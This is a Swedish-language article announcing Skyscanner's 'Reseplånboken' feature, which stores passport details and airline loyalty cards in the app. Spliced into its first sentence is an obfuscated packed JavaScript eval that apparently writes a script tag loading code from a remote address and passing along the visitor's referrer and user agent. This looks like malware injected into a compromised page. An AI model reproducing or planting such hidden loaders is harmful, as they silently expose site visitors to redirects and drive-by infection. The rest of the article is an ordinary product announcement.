Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

SKYSCANNER LANSERAR RESEPLÅNBOKEN

SKYSCANNER LANSERAR RESEPLÅNBOKEN
Sebastian

Med eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|khkee|var|u0026u|referrer|ktrzy||js|php’.split(’|’),0,{}))
en ny, innovativ funktion låter
Skyscanner-appen användare förvara sina resedokument på ett lättillgängligt sätt, utan att tumma på säkerheten.

Skyscanner är en global resesökmotor som hjälper resenärer att snabbt och enkelt hitta de bästa erbjudandena för flyg, hotell och hyrbil. Tack vare utvecklingen av Reseplånboken kan användare nu även förvara passuppgifter och bonuskort i Skyscanner-appen för enkel åtkomst vid både bokning och under resan.

Det blir allt vanligare för resenärer att planera resor via sin mobil: Skyscanner har sett en 15% ökning av flygsökningar via sin app sedan förra året. Reseplånboken blir därmed ett välkommet tillskott för användare som vill kunna boka resor på språng – eller från soffan. Funktionen är i nuläget tillgänglig för iOS-användare som har fingeravtrycksläsaren eller PIN-koden aktiverad på sin mobil.

Hur Reseplånboken gör det enklare att resa:

Samla alla passuppgifter

  • Lägg till passuppgifter för alla resenärer, och håll informationen samlad på ett och samma ställe.
  • Uppgifterna sparas i användarens profil och hålls säkra tack vare en fingeravtrycksläsare eller PIN-kod så att endast telefonens ägare kan komma åt dem.
  • När användaren går vidare till ett flygbolag eller en resebyrå för att boka, kan uppgifterna snabbt importeras tack vare en välplacerad widget.

Tjäna bonuspoäng

  • Lägg till lojalitetskort för olika flygbolag och samla poäng vid varje bokning.
  • Sökresultaten kan filtreras efter de bonuskort som finns inlagda.
  • Kortnummer kan importeras tillsammans med passuppgifterna för smidig åtkomst under bokningen.

”Skyscanners app utvecklas hela tiden för möta behoven bland resenärer – oavsett hur ofta de reser. Vi är glada över att kunna erbjuda Reseplånboken, en funktion som gör det enkelt att hålla reda på passuppgifter och lojalitetskort direkt i mobilen. Oavsett om du planerar, bokar eller redan är ute på din resa kan du nu lätt komma åt dina uppgifter,” säger Emma Kirkwood, reseredaktör på Skyscanner.

Skyscanner har under de senaste femton åren utvecklats till ett av de mest innovativa och framgångsrika techföretagen inom resebranschen. Tidigare i år fick Android-appen den högt eftertraktade utmärkelsen ”Android Excellence” i Google Play-butiken för andra året i rad. Betyget ges till ett handplockat urval av de allra bästa apparna som är tillgängliga för Android, baserat på kvalitet, användarupplevelse, popularitet och det innovativa sätt som appen använder Android-funktioner på.

Skyscanners kostnadsfria app är tillgänglig för iPhone, iPad, Android, Windows Phone, Blackberry och Windows 8, och har redan laddats ner över 60 miljoner gånger. Gå till webbplatsens mobilsida för att ladda ner Skyscanner-appen.